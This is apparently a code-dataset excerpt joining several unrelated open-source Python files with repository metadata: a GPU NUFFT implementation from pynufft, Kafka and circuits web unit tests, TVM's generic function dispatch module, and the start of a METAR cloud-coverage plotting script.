Kd = (256,256,256) for a 3D image
:param Jd: The interpolator size.
Example: Jd=(6,6) for 2D image;
Jd = (6,6,6) for a 3D image
:param ft_axes: The dimensions to be transformed by FFT.
Example: ft_axes = (0, 1) for 2D,
ft_axes = (0, 1, 2) for 3D;
ft_axes = None for all dimensions.
:param batch: Batch NUFFT.
If provided, the shape is Nd + (batch, ).
The last axis is the number of parallel coils.
batch = None for single coil.
:param radix: ????.
If provided, the shape is Nd + (batch, ).
The last axis is the number of parallel coils.
batch = None for single coil.
:type om: numpy.float array, matrix size = (M, ndims)
:type Nd: tuple, ndims integer elements.
:type Kd: tuple, ndims integer elements.
:type Jd: tuple, ndims integer elements.
:type ft_axes: tuple, selected axes to be transformed.
:type batch: int or None
:returns: 0
:rtype: int, float
:Example:
>>> from pynufft import NUFFT_hsa
>>> NufftObj = NUFFT_hsa()
>>> NufftObj.plan(om, Nd, Kd, Jd)
"""
self.ndims = len(Nd) # dimension
if ft_axes is None:
ft_axes = range(0, self.ndims)
self.ft_axes = ft_axes
self.st = helper.plan(om, Nd, Kd, Jd, ft_axes=ft_axes,
format='pELL', radix=radix)
if batch is None:
self.parallel_flag = 0
else:
self.parallel_flag = 1
if batch is None:
self.batch = numpy.uint32(1)
else:
self.batch = numpy.uint32(batch)
self.Nd = self.st['Nd'] # backup
self.Kd = self.st['Kd']
# self.sn = numpy.asarray(self.st['sn'].astype(self.dtype),
# order='C')# backup
if self.batch == 1 and (self.parallel_flag == 0):
self.multi_Nd = self.Nd
self.multi_Kd = self.Kd
self.multi_M = (self.st['M'], )
# Broadcasting the sense and scaling factor (Roll-off)
# self.sense2 = self.sense*numpy.reshape(self.sn, self.Nd + (1, ))
else: # self.batch is 0:
self.multi_Nd = self.Nd + (self.batch, )
self.multi_Kd = self.Kd + (self.batch, )
self.multi_M = (self.st['M'], ) + (self.batch, )
self.invbatch = 1.0 / self.batch
self.Kdprod = numpy.uint32(numpy.prod(self.st['Kd']))
self.Jdprod = numpy.uint32(numpy.prod(self.st['Jd']))
self.Ndprod = numpy.uint32(numpy.prod(self.st['Nd']))
self.Nd_elements, self.invNd_elements = helper.strides_divide_itemsize(
self.st['Nd'])
# only return the Kd_elements
self.Kd_elements = helper.strides_divide_itemsize(self.st['Kd'])[0]
self.NdCPUorder, self.KdCPUorder, self.nelem = helper.preindex_copy(
self.st['Nd'],
self.st['Kd'])
self.offload()
return 0
@push_cuda_context
def offload(self): # API, platform_number=0, device_number=0):
"""
self.offload():
Off-load NUFFT to the opencl or cuda device(s)
:param API: define the device type, which can be 'cuda' or 'ocl'
:param platform_number: define which platform to be used.
The default platform_number = 0.
:param device_number: define which device to be used.
The default device_number = 0.
:type API: string
:type platform_number: int
:type device_number: int
:return: self: instance
"""
self.pELL = {} # dictionary
self.pELL['nRow'] = numpy.uint32(self.st['pELL'].nRow)
self.pELL['prodJd'] = numpy.uint32(self.st['pELL'].prodJd)
self.pELL['sumJd'] = numpy.uint32(self.st['pELL'].sumJd)
self.pELL['dim'] = numpy.uint32(self.st['pELL'].dim)
self.pELL['Jd'] = self.thr.to_device(
self.st['pELL'].Jd.astype(numpy.uint32))
self.pELL['meshindex'] = self.thr.to_device(
self.st['pELL'].meshindex.astype(numpy.uint32))
self.pELL['kindx'] = self.thr.to_device(
self.st['pELL'].kindx.astype(numpy.uint32))
self.pELL['udata'] = self.thr.to_device(
self.st['pELL'].udata.astype(self.dtype))
self.volume = {}
self.volume['Nd_elements'] = self.thr.to_device(
numpy.asarray(self.Nd_elements, dtype=numpy.uint32))
self.volume['Kd_elements'] = self.thr.to_device(
numpy.asarray(self.Kd_elements, dtype=numpy.uint32))
self.volume['invNd_elements'] = self.thr.to_device(
self.invNd_elements.astype(numpy.float32))
self.volume['Nd'] = self.thr.to_device(numpy.asarray(
self.st['Nd'], dtype=numpy.uint32))
self.volume['NdGPUorder'] = self.thr.to_device(self.NdCPUorder)
self.volume['KdGPUorder'] = self.thr.to_device(self.KdCPUorder)
self.volume['gpu_coil_profile'] = self.thr.array(
self.multi_Nd, dtype=self.dtype).fill(1.0)
Nd = self.st['Nd']
# tensor_sn = numpy.empty((numpy.sum(Nd), ), dtype=numpy.float32)
#
# shift = 0
# for dimid in range(0, len(Nd)):
#
# tensor_sn[shift :shift + Nd[dimid]] = \
# self.st['tensor_sn'][dimid][:, 0].real
# shift = shift + Nd[dimid]
# self.volume['tensor_sn'] = self.thr.to_device(
# self.st['tensor_sn'].astype(numpy.float32))
self.tSN = {}
self.tSN['Td_elements'] = self.thr.to_device(
numpy.asarray(self.st['tSN'].Td_elements, dtype=numpy.uint32))
self.tSN['invTd_elements'] = self.thr.to_device(
self.st['tSN'].invTd_elements.astype(numpy.float32))
self.tSN['Td'] = self.thr.to_device(
numpy.asarray(self.st['tSN'].Td, dtype=numpy.uint32))
self.tSN['Tdims'] = self.st['tSN'].Tdims
self.tSN['tensor_sn'] = self.thr.to_device(
self.st['tSN'].tensor_sn.astype(numpy.float32))
self.Ndprod = numpy.int32(numpy.prod(self.st['Nd']))
self.Kdprod = numpy.int32(numpy.prod(self.st['Kd']))
self.M = numpy.int32(self.st['M'])
import reikna.fft
if self.batch > 1: # batch mode
self.fft = reikna.fft.FFT(
numpy.empty(self.st['Kd']+(self.batch, ), dtype=self.dtype),
self.ft_axes).compile(self.thr, fast_math=False)
else: # elf.Reps == 1 Batch mode is wrong for
self.fft = reikna.fft.FFT(
numpy.empty(self.st['Kd'], dtype=self.dtype),
self.ft_axes).compile(self.thr, fast_math=False)
self.zero_scalar = self.dtype(0.0+0.0j)
del self.st['pELL']
if self.verbosity > 0:
print('End of offload')
@push_cuda_context
def reset_sense(self):
self.volume['gpu_coil_profile'].fill(1.0)
@push_cuda_context
def set_sense(self, coil_profile):
if coil_profile.shape != self.multi_Nd:
print('The shape of coil_profile is ', coil_profile.shape)
print('But it should be', self.Nd + (self.batch, ))
raise ValueError
else:
self.volume['gpu_coil_profile'] = self.thr.to_device(
coil_profile.astype(self.dtype))
if self.verbosity > 0:
print('Successfully loading coil sensitivities!')
# if coil_profile.shape == self.Nd + (self.batch, ):
@push_cuda_context
def to_device(self, image, shape=None):
g_image = self.thr.array(image.shape, dtype=self.dtype)
self.thr.to_device(image.astype(self.dtype), dest=g_image)
return g_image
@push_cuda_context
def s2x(self, s):
x = self.thr.array(self.multi_Nd, dtype=self.dtype)
# print("Now populate the array to multi-coil")
self.prg.cPopulate(
self.batch,
self.Ndprod,
s,
x,
local_size=None,
global_size=int(self.batch * self.Ndprod))
# x2 = x * self.volume['gpu_coil_profile']
# try:
# x2 = x * self.volume['gpu_coil_profile']
# except:
# x2 = x
self.prg.cMultiplyVecInplace(
numpy.uint32(1),
self.volume['gpu_coil_profile'],
x,
local_size=None,
global_size=int(self.batch*self.Ndprod))
# self.prg.cDistribute(
# self.batch,
# self.Ndprod,
# self.volume['gpu_coil_profile'],
# s,
# x,
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
return x
@push_cuda_context
def x2xx(self, x):
# xx = self.thr.array(xx.shape, dtype = self.dtype)
# self.thr.copy_array(z, dest=xx, )
# size = int(xx.nbytes/xx.dtype.itemsize))
# Hack of error in cuda backends; 8 is the byte of numpy.complex64
# size = int(xx.nbytes/8)
xx = self.thr.array(x.shape, dtype=self.dtype)
self.thr.copy_array(x, dest=xx, )
# size = int(xx.nbytes/xx.dtype.itemsize))
# Hack of error in cuda backends; 8 is the byte of numpy.complex64:
# size = int(xx.nbytes/8)
# self.prg.cMultiplyRealInplace(
# self.batch,
# self.volume['SnGPUArray'],
# xx,
# local_size=None,
# global_size=int(self.Ndprod*self.batch))
# self.prg.cTensorMultiply(numpy.uint32(self.batch),
# numpy.uint32(self.ndims),
# self.volume['Nd'],
# self.volume['Nd_elements'],
# self.volume['invNd_elements'],
# self.volume['tensor_sn'],
# xx,
# numpy.uint32(0),
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
self.prg.cTensorMultiply(numpy.uint32(self.batch),
numpy.uint32(self.tSN['Tdims']),
self.tSN['Td'],
self.tSN['Td_elements'],
self.tSN['invTd_elements'],
self.tSN['tensor_sn'],
xx,
numpy.uint32(0),
local_size=None,
global_size=int(self.batch*self.Ndprod))
# self.thr.synchronize()
return xx
@push_cuda_context
def xx2k(self, xx):
"""
Private: oversampled FFT on the heterogeneous device
First, zeroing the self.k_Kd array
Second, copy self.x_Nd array to self.k_Kd array by cSelect
Third, inplace FFT
"""
k = self.thr.array(self.multi_Kd, dtype=self.dtype)
# k = self.thr.array(self.multi_Kd, dtype=self.dtype).fill(0.0 + 0.0j)
k.fill(0)
# self.prg.cMultiplyScalar(self.zero_scalar,
# k,
# local_size=None,
# global_size=int(self.Kdprod))
# # self.prg.cSelect(self.NdGPUorder,
# self.KdGPUorder,
# xx,
# k,
# local_size=None,
# global_size=int(self.Ndprod))
# self.prg.cSelect2(self.batch,
# self.volume['NdGPUorder'],
# self.volume['KdGPUorder'],
# xx,
# k,
# local_size=None,
# global_size=int(self.Ndprod*self.batch))
self.prg.cTensorCopy(
self.batch,
numpy.uint32(self.ndims),
self.volume['Nd_elements'],
self.volume['Kd_elements'],
self.volume['invNd_elements'],
xx,
k,
numpy.int32(1), # Directions: Nd -> Kd, 1; Kd -> Nd, -1
local_size=None,
global_size=int(self.Ndprod))
self.fft(k, k, inverse=False)
# self.thr.synchronize()
return k
@push_cuda_context
def k2y(self, k):
"""
Private: interpolation by the Sparse Matrix-Vector Multiplication
"""
# if self.parallel_flag is 1:
# y =self.thr.array((self.st['M'], self.batch),
# dtype=self.dtype).fill(0)
# else:
# y =self.thr.array( (self.st['M'], ), dtype=self.dtype).fill(0)
y = self.thr.array(self.multi_M, dtype=self.dtype).fill(0)
self.prg.pELL_spmv_mCoil(
self.batch,
self.pELL['nRow'],
self.pELL['prodJd'],
self.pELL['sumJd'],
self.pELL['dim'],
self.pELL['Jd'],
# self.pELL_currsumJd,
self.pELL['meshindex'],
self.pELL['kindx'],
self.pELL['udata'],
k,
y,
local_size=int(self.wavefront),
global_size=int(self.pELL['nRow'] *
self.batch * self.wavefront)
)
# self.thr.synchronize()
return y
@push_cuda_context
def y2k(self, y):
"""
Private: gridding by the Sparse Matrix-Vector Multiplication
However, serial atomic add is far too slow and inaccurate.
"""
# kx = self.thr.array(self.multi_Kd, dtype=numpy.float32).fill(0.0)
# ky = self.thr.array(self.multi_Kd, dtype=numpy.float32).fill(0.0)
k = self.thr.array(self.multi_Kd, dtype=numpy.complex64).fill(0.0)
res = self.thr.array(self.multi_Kd, dtype=numpy.complex64).fill(0.0)
# array which saves the residue of two sum
self.prg.pELL_spmvh_mCoil(
self.batch,
self.pELL['nRow'],
self.pELL['prodJd'],
self.pELL['sumJd'],
self.pELL['dim'],
self.pELL['Jd'],
self.pELL['meshindex'],
self.pELL['kindx'],
self.pELL['udata'],
# kx, ky,
k,
res,
y,
local_size=None,
global_size=int(self.pELL['nRow']*self.batch )#*
# int(self.pELL['prodJd']) * int(self.batch))
)
return k + res
@push_cuda_context
def k2xx(self, k):
"""
Private: the inverse FFT and image cropping (which is the reverse of
_xx2k() method)
"""
self.fft(k, k, inverse=True)
# self.thr.synchronize()
# self.x_Nd._zero_fill()
# self.prg.cMultiplyScalar(self.zero_scalar,
# xx,
# local_size=None,
# global_size=int(self.Ndprod))
# if self.parallel_flag is 1:
# xx = self.thr.array(self.st['Nd']+(self.batch, ),
# dtype = self.dtype)
# else:
# xx = self.thr.array(self.st['Nd'], dtype = self.dtype)
xx = self.thr.array(self.multi_Nd, dtype=self.dtype)
xx.fill(0)
# self.prg.cSelect(self.queue,
# (self.Ndprod,),
# None,
# self.volume['KdGPUorder'].data,
# self.NdGPUorder.data,
# self.k_Kd2.data,
# self.x_Nd.data)
# self.prg.cSelect2(self.batch,
# self.volume['KdGPUorder'],
# self.volume['NdGPUorder'],
# k,
# xx,
# local_size=None,
# global_size=int(self.Ndprod*self.batch))
self.prg.cTensorCopy(
self.batch,
numpy.uint32(self.ndims),
self.volume['Nd_elements'],
self.volume['Kd_elements'],
self.volume['invNd_elements'],
k,
xx,
numpy.int32(-1),
local_size=None,
global_size=int(self.Ndprod))
return xx
@push_cuda_context
def xx2x(self, xx):
x = self.thr.array(xx.shape, dtype=self.dtype)
self.thr.copy_array(xx, dest=x, )
# size = int(xx.nbytes/xx.dtype.itemsize))
# Hack of error in cuda backends; 8 is the byte of numpy.complex64
# size = int(xx.nbytes/8)
# self.prg.cMultiplyRealInplace(self.batch,
# self.volume['SnGPUArray'],
# z,
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
# self.prg.cTensorMultiply(numpy.uint32(self.batch),
# numpy.uint32(self.ndims),
# self.volume['Nd'],
# self.volume['Nd_elements'],
# self.volume['invNd_elements'],
# self.volume['tensor_sn'],
# x,
# numpy.uint32(0),
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
self.prg.cTensorMultiply(numpy.uint32(self.batch),
numpy.uint32(self.tSN['Tdims']),
self.tSN['Td'],
self.tSN['Td_elements'],
self.tSN['invTd_elements'],
self.tSN['tensor_sn'],
x,
numpy.uint32(0),
local_size=None,
global_size=int(self.batch *
self.Ndprod))
# self.thr.synchronize()
return x
@push_cuda_context
def x2s(self, x):
s = self.thr.array(self.st['Nd'], dtype=self.dtype)
# try:
self.prg.cMultiplyConjVecInplace(
numpy.uint32(1),
self.volume['gpu_coil_profile'],
x,
local_size=None,
global_size=int(self.batch*self.Ndprod))
# x2 = x * self.volume['gpu_coil_profile'].conj()
# except:
# x2 = x
self.prg.cAggregate(
self.batch,
self.Ndprod,
x,
s,
local_size=int(self.wavefront),
global_size=int(self.batch*self.Ndprod*self.wavefront))
# self.prg.cMerge(self.batch,
# self.Ndprod,
# self.volume['gpu_coil_profile'],
# x,
# s,
# local_size=int(self.wavefront),
# global_size = int(self.batch*self.Ndprod*
# self.wavefront))
return s
@push_cuda_context
def selfadjoint_one2many2one(self, gx):
"""
selfadjoint_one2many2one NUFFT on the heterogeneous device
:param gx: The input gpu array, with size=Nd
:type gx: reikna gpu array with dtype =numpy.complex64
:return: gx: The output gpu array, with size=Nd
:rtype: reikna gpu array with dtype =numpy.complex64
"""
gy = self.forward_one2many(gx)
gx2 = self.adjoint_many2one(gy)
del gy
return gx2
def selfadjoint(self, gx):
"""
selfadjoint NUFFT on the heterogeneous device
:param gx: The input gpu array, with size=Nd
:type gx: reikna gpu array with dtype =numpy.complex64
:return: gx: The output gpu array, with size=Nd
:rtype: reikna gpu array with dtype =numpy.complex64
"""
gy = self.forward(gx)
gx2 = self.adjoint(gy)
del gy
return gx2
@push_cuda_context
def forward(self, gx):
"""
Forward NUFFT on the heterogeneous device
:param gx: The input gpu array, with size = Nd
:type gx: reikna gpu array with dtype = numpy.complex64
:return: gy: The output gpu array, with size = (M,)
:rtype: reikna gpu array with dtype = numpy.complex64
"""
try:
xx = self.x2xx(gx)
except: # gx is not a gpu array
try:
warnings.warn('The input array may not be a GPUarray '
'Automatically moving the input array to gpu, '
'which is throttled by PCIe.', UserWarning)
px = self.to_device(gx, )
# pz = self.thr.to_device(numpy.asarray(gz.astype(self.dtype),
# order = 'C' ))
xx = self.x2xx(px)
except:
if gx.shape != self.Nd + (self.batch, ):
warnings.warn('Shape of the input is ' + str(gx.shape) +
' while it should be ' +
str(self.Nd+(self.batch, )), UserWarning)
raise
k = self.xx2k(xx)
del xx
gy = self.k2y(k)
del k
return gy
@push_cuda_context
def forward_one2many(self, s):
try:
x = self.s2x(s)
except: # gx is not a gpu array
try:
warnings.warn('In s2x(): The input array may not be '
'a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
ps = self.to_device(s, )
# px = self.thr.to_device(numpy.asarray(x.astype(self.dtype),
# order = 'C' ))
x = self.s2x(ps)
except:
if s.shape != self.Nd:
warnings.warn('Shape of the input is ' + str(x.shape) +
' while it should be ' +
str(self.Nd), UserWarning)
raise
y = self.forward(x)
return y
@push_cuda_context
def adjoint_many2one(self, y):
try:
x = self.adjoint(y)
except: # gx is not a gpu array
try:
if self.verbosity > 0:
print('y.shape = ', y.shape)
warnings.warn('In adjoint_many2one(): The input array may not '
'be a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
py = self.to_device(y, )
# py = self.thr.to_device(numpy.asarray(y.astype(self.dtype),
# order = 'C' ))
x = self.adjoint(py)
except:
print('Failed at self.adjoint_many2one! Please check the gy'
' shape, type and stride.')
raise
# z = self.adjoint(y)
s = self.x2s(x)
return s
@push_cuda_context
def adjoint(self, gy):
"""
Adjoint NUFFT on the heterogeneous device
:param gy: The input gpu array, with size=(M,)
:type: reikna gpu array with dtype =numpy.complex64
:return: gx: The output gpu array, with size=Nd
:rtype: reikna gpu array with dtype =numpy.complex64
"""
try:
k = self.y2k(gy)
except: # gx is not a gpu array
try:
warnings.warn('In adjoint(): The input array may not '
'be a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
py = self.to_device(gy, )
# py = self.thr.to_device(numpy.asarray(gy.astype(self.dtype),
# order = 'C' ))
k = self.y2k(py)
except:
print('Failed at self.adjont! Please check the gy shape, '
'type, stride.')
raise
# k = self.y2k(gy)
xx = self.k2xx(k)
del k
gx = self.xx2x(xx)
del xx
return gx
@push_cuda_context
def release(self):
del self.volume
del self.prg
del self.pELL
self.thr.release()
del self.thr
@push_cuda_context
def solve(self, gy, solver=None, *args, **kwargs):
"""
The solver of NUFFT_hsa
:param gy: data, reikna array, (M,) size
:param solver: could be 'cg', 'L1TVOLS', 'L1TVLAD'
:param maxiter: the number of iterations
:type gy: reikna array, dtype = numpy.complex64
:type solver: string
:type maxiter: int
:return: reikna array with size Nd
"""
from ..linalg.solve_hsa import solve
try:
return solve(self, gy, solver, *args, **kwargs)
except:
try:
warnings.warn('In solve(): The input array may not '
'be a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
py = self.to_device(gy, )
return solve(self, py, solver, *args, **kwargs)
except:
if numpy.ndarray == type(gy):
print("Input gy must be a reikna array with dtype ="
" numpy.complex64")
raise # TypeError
else:
print("wrong")
raise # TypeError
|
a63e55f45fc6c1e315655e8ca1e265990b836bfa
|
3083a4918f9a9a0670ce83566341eba04b290bc4
|
/tests/kafka_consumer_manager/test_watermark_get.py
|
a1c098aaa0bae4283625dce98711b5513b72525d
|
[
"Apache-2.0"
] |
permissive
|
Yelp/kafka-utils
|
b122c0aad0dfc225e948623ceaf466e7e63d9f91
|
def433ec4d07c60290d5dc937d3b4e5189eca9dc
|
refs/heads/master
| 2023-08-31T06:20:33.740273
| 2023-08-24T10:15:43
| 2023-08-24T10:15:43
| 55,727,134
| 322
| 142
|
Apache-2.0
| 2023-08-24T10:15:44
| 2016-04-07T20:50:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,168
|
py
|
test_watermark_get.py
|
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
import pytest
from kafka_utils.kafka_consumer_manager. \
commands.watermark_get import WatermarkGet
class TestGetWatermark:
@pytest.yield_fixture
def client(self):
with mock.patch(
'kafka_utils.kafka_consumer_manager.'
'commands.watermark_get.KafkaToolClient',
autospec=True,
) as mock_client:
yield mock_client
def test_get_watermark_for_topic(self, client):
topics = '__consumer_offsets'
client.topic_partitions = {}
with mock.patch(
'kafka_utils.kafka_consumer_manager.commands.'
'watermark_get.get_watermark_for_topic',
return_value={'test_topic': [1, 99, 3]},
autospec=True,
) as mock_get_watermark:
WatermarkGet.get_watermarks(
client,
topics,
exact=True
)
assert mock_get_watermark.call_count == 1
def test_get_watermark_for_regex(self, client):
topics = '__consumer_*'
client.topic_partitions = {}
with mock.patch(
'kafka_utils.kafka_consumer_manager.commands.'
'watermark_get.get_watermark_for_regex',
return_value={'__consumer_1': [1, 99, 3],
'__consumer_2': [2, 100, 2]},
autospec=True,
) as mock_get_watermark:
WatermarkGet.get_watermarks(
client,
topics,
exact=False
)
assert mock_get_watermark.call_count == 1
|
d7b5e734eae128fb0949d8d50728676b09f43e86
|
2d05050d0ada29f7680b4df20c10bb85b0530e45
|
/python/tvm/target/generic_func.py
|
7b6f916bd9755bb4f0ccd44fd0f8638dc199ccc4
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"Zlib",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
apache/tvm
|
87cb617f9a131fa44e1693303aaddf70e7a4c403
|
d75083cd97ede706338ab413dbc964009456d01b
|
refs/heads/main
| 2023-09-04T11:24:26.263032
| 2023-09-04T07:26:00
| 2023-09-04T07:26:00
| 70,746,484
| 4,575
| 1,903
|
Apache-2.0
| 2023-09-14T19:06:33
| 2016-10-12T22:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 8,938
|
py
|
generic_func.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Generic function."""
import tvm._ffi
try:
from decorator import decorate
except ImportError:
# Allow decorator to be missing in runtime
if not tvm._ffi.base._RUNTIME_ONLY:
raise
from tvm.runtime import Object
from .target import Target
from . import _ffi_api
@tvm._ffi.register_object
class GenericFunc(Object):
"""GenericFunc node reference. This represents a generic function
that may be specialized for different targets. When this object is
called, a specialization is chosen based on the current target.
Note
----
Do not construct an instance of this object, it should only ever be
used as a return value from calling into C++.
"""
def __call__(self, *args):
return _ffi_api.GenericFuncCallFunc(self, *args)
def set_default(self, func, allow_override=False):
"""Set the default function to be used if no specializations match
the current target.
Parameters
----------
func : function
The default function
allow_override : bool
Whether to allow the current default to be overridden
"""
_ffi_api.GenericFuncSetDefault(self, func, allow_override)
def register(self, func, key_list, allow_override=False):
"""Register a specialization for this GenericFunc.
Parameters
----------
func : function
The function to be registered.
key : str or list of str
The key to be registered.
allow_override : bool, optional
Whether to allow existing keys to be overridden.
"""
key_list = [key_list] if isinstance(key_list, str) else key_list
_ffi_api.GenericFuncRegisterFunc(self, func, key_list, allow_override)
def get_packed_func(self):
"""Get the packed function specified for the current target.
Returns
-------
func : PackedFunc
The function specified for the current target. Return the default
function if no specializations match the current target.
"""
return _ffi_api.GenericFuncGetPackedFunc(self)
def get_native_generic_func(name):
"""Get a generic function from the global registry. If no
function is registered under the given name, a new generic
function is created.
Parameters
----------
name : string
The name of the generic function to get
Returns
-------
func : GenericFunc
The generic function for the given name
"""
return _ffi_api.GenericFuncGetGlobal(name)
def override_native_generic_func(func_name):
"""Override a generic function defined in C++
Generic function allows registration of further functions
that can be dispatched on current target context.
If no registered dispatch is matched, the fdefault will be called.
Parameters
----------
func_name : string
The name of the generic func to be overridden
Returns
-------
fgeneric : function
A wrapped generic function.
Example
-------
.. code-block:: python
import tvm
# wrap function as target generic
@tvm.target.override_native_generic_func("my_func")
def my_func(a):
return a + 1
# register specialization of my_func under target cuda
@my_func.register("cuda")
def my_func_cuda(a):
return a + 2
# displays 3, because my_func is called
print(my_func(2))
# displays 4, because my_func_cuda is called
with tvm.target.cuda():
print(my_func(2))
"""
generic_func_node = get_native_generic_func(func_name)
def fdecorate(fdefault):
"""Wrap a target generic function, overriding the previous
default that was set for the generic function.
Parameters
----------
fdefault : function
The default function.
Returns
-------
fgeneric : function
A wrapped generic function.
"""
generic_func_node.set_default(fdefault, allow_override=True)
def register(key, func=None, override=True):
"""Register function to be the dispatch function.
Parameters
----------
key : str or list of str
The key to be registered.
func : function
The function to be registered.
override : bool, optional
Whether override existing registration.
Returns
-------
The register function is necessary.
"""
def _do_reg(myf):
generic_func_node.register(myf, key, override)
return myf
if func:
return _do_reg(func)
return _do_reg
def dispatch_func(func, *args, **kwargs):
# pylint: disable=unused-argument
"""The wrapped dispath function"""
if kwargs:
raise RuntimeError(
"Keyword arguments cannot be used when invoking generic_func %s" % func_name
)
return generic_func_node(*args)
fresult = decorate(fdefault, dispatch_func)
fresult.fdefault = fdefault
fresult.register = register
fresult.generic_func_node = generic_func_node
return fresult
return fdecorate
def generic_func(fdefault):
"""Wrap a target generic function.
Generic function allows registration of further functions
that can be dispatched on current target context.
If no registered dispatch is matched, the fdefault will be called.
Parameters
----------
fdefault : function
The default function.
Returns
-------
fgeneric : function
A wrapped generic function.
Example
-------
.. code-block:: python
import tvm
# wrap function as target generic
@tvm.target.generic_func
def my_func(a):
return a + 1
# register specialization of my_func under target cuda
@my_func.register("cuda")
def my_func_cuda(a):
return a + 2
# displays 3, because my_func is called
print(my_func(2))
# displays 4, because my_func_cuda is called
with tvm.target.cuda():
print(my_func(2))
"""
dispatch_dict = {}
func_name = fdefault.__name__
def register(key, func=None, override=False):
"""Register function to be the dispatch function.
Parameters
----------
key : str or list of str
The key to be registered.
func : function
The function to be registered.
override : bool
Whether override existing registration.
Returns
-------
The register function is necessary.
"""
def _do_reg(myf):
key_list = [key] if isinstance(key, str) else key
for k in key_list:
if k in dispatch_dict and not override:
raise ValueError("Key is already registered for %s" % func_name)
dispatch_dict[k] = myf
return myf
if func:
return _do_reg(func)
return _do_reg
def dispatch_func(func, *args, **kwargs):
"""The wrapped dispatch function"""
target = Target.current()
if target is None:
return func(*args, **kwargs)
for k in target.keys:
if k in dispatch_dict:
return dispatch_dict[k](*args, **kwargs)
return func(*args, **kwargs)
def get_packed_func():
"""The wrapped to get dispatched function"""
target = Target.current()
if target is None:
return fdefault
for k in target.keys:
if k in dispatch_dict:
return dispatch_dict[k]
return fdefault
fdecorate = decorate(fdefault, dispatch_func)
fdecorate.register = register
fdecorate.fdefault = fdefault
fdecorate.dispatch_dict = dispatch_dict
fdecorate.get_packed_func = get_packed_func
return fdecorate
|
9dc35bbd5147a10536069e970ea4f85d7760ebde
|
d5e1591a6b96ec0e35ea223269da38b15fffe600
|
/tests/web/test_vpath_args.py
|
44e8e8b88fdfb85fe5b9368d561bed5c4e7c2b43
|
[
"MIT"
] |
permissive
|
circuits/circuits
|
630cfa0fa13b19f84bfb96705912f3f6a26c69e1
|
87fb5a3380069d907d2ac500d13418b1abdeb2f2
|
refs/heads/master
| 2023-07-31T07:17:06.706151
| 2023-02-07T19:39:20
| 2023-02-07T19:39:20
| 12,450,349
| 310
| 80
|
NOASSERTION
| 2023-01-06T00:08:37
| 2013-08-29T03:05:42
|
Python
|
UTF-8
|
Python
| false
| false
| 685
|
py
|
test_vpath_args.py
|
#!/usr/bin/env python
from circuits.web import Controller, expose
from .helpers import urlopen
class Root(Controller):
@expose("test.txt")
def index(self):
return "Hello world!"
class Leaf(Controller):
channel = "/test"
@expose("test.txt")
def index(self, vpath=None):
if vpath is None:
return "Hello world!"
else:
return "Hello world! " + vpath
def test(webapp):
Leaf().register(webapp)
f = urlopen(webapp.server.http.base + "/test.txt")
s = f.read()
assert s == b"Hello world!"
f = urlopen(webapp.server.http.base + "/test/test.txt")
s = f.read()
assert s == b"Hello world!"
|
aa4b7fd5a516164cc7aeee8f62fa155d419caf1a
|
f6aac61a48a87743be9c40fecdc24344bae4d263
|
/htdocs/plotting/auto/scripts/p40.py
|
362d829d23dfa2bfa3ed4bfc34304f7261bae54e
|
[
"MIT"
] |
permissive
|
akrherz/iem
|
8714d99b371c8818f7cdde73dd24639e9fc7d42b
|
178015584b7fb5b585f65be6013eaf16fb6db0c7
|
refs/heads/main
| 2023-08-19T02:58:24.507782
| 2023-08-18T12:08:31
| 2023-08-18T12:08:31
| 4,253,774
| 118
| 74
|
MIT
| 2023-09-14T18:28:41
| 2012-05-07T20:32:59
|
Python
|
UTF-8
|
Python
| false
| false
| 7,044
|
py
|
p40.py
|
"""
This chart is an attempted illustration of the
amount of cloudiness that existed at a METAR site for a given month.
The chart combines reports of cloud amount and level to provide a visual
representation of the cloudiness. Once the METAR site hits a cloud level
of overcast, it can no longer sense clouds above that level. So while the
chart will indicate cloudiness up to the top, it may not have been like
that in reality.
"""
import datetime
import numpy as np
import pandas as pd
from matplotlib.patches import Rectangle
from pyiem.exceptions import NoDataFound
from pyiem.plot import figure, get_cmap
from pyiem.util import get_autoplot_context, get_sqlalchemy_conn, utc
PDICT = {"sky": "Sky Coverage + Visibility", "vsby": "Just Visibility"}
def get_description():
"""Return a dict describing how to call this plotter"""
desc = {"description": __doc__, "data": True, "cache": 3600}
today = datetime.date.today()
desc["arguments"] = [
dict(
type="zstation",
name="zstation",
default="DSM",
network="IA_ASOS",
label="Select Station:",
),
dict(
type="month",
name="month",
label="Select Month:",
default=today.month,
),
dict(
type="select",
options=PDICT,
name="ptype",
default="sky",
label="Available Plot Types",
),
dict(
type="year",
name="year",
label="Select Year:",
default=today.year,
min=1970,
),
]
return desc
def plot_sky(days, vsby, data, ctx, sts):
"""Sky plot variant."""
fig = figure(apctx=ctx)
# vsby plot
ax = fig.add_axes([0.1, 0.08, 0.8, 0.03])
ax.set_xticks(np.arange(0, int(days * 24) - 1, 24))
ax.set_xticklabels(np.arange(1, days + 1))
ax.set_yticks([])
